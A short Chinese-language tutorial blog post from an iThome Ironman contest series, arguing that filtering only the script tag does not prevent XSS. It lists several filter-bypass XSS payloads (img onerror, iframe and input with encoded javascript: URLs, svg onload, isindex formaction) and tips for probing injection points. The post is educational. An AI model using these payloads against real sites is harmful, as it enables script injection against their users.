Web Security 魔法使攻略─你以為過濾就可以防範 XSS 嗎 - iT 邦幫忙::一起幫忙解決難題，拯救 IT 人的一天

第 11 屆 iThome 鐵人賽

DAY 14

1

Security

Web Security 魔法使攻略系列第 14 篇

Web Security 魔法使攻略─你以為過濾就可以防範 XSS 嗎

11th鐵人賽

團隊魔喵戰隊

2019-09-30 23:10:19

1517 瀏覽

分享至

正文

「我覺得我們就過濾 script 那個標籤就好，這樣就沒有 XSS 了」
好想放個梗圖

我想你該看看這份 XSS payload
你可以看到不一定是 <script> 才能執行 Js 語法哦！

<img src=xss onerror=alert(1)>
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<form><isindex formaction="javascript&colon;confirm(1)"

「老大我想把 XSS 這個技能點好點滿!」
我成全你，來玩

「可以給我一些 tips 嗎？」

看到可以塞字串的地方，塞惡意字串
會印出的地方看有沒有過濾字串或是被編碼
如果沒有被編碼，就常是看看能不能閉合前面的標籤
瀏覽器會幫你補 tag 所以只要前面繞過後面就比較不重要
IE Chrome 繞過方式不同，payload 可能不會通用
Chrome 繞不過，先用 IE 繞看看

Web Security 魔法使攻略─快速寫 Request 的方法

Web Security 魔法使攻略─CSRF

系列文

Web Security 魔法使攻略共 30 篇

目錄

RSS系列文訂閱系列文

57 人訂閱

完整目錄

直播研討會

{{ item.subject }}

{{ item.channelVendor }} {{ item.webinarstarted }} |

{{ formatDate(item.duration) }}

直播中

尚未有邦友留言

立即登入留言

參賽組數

1064 組

團體組數

40 組

累計文章數

22200 篇

完賽人數

602 人

15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js

IT邦幫忙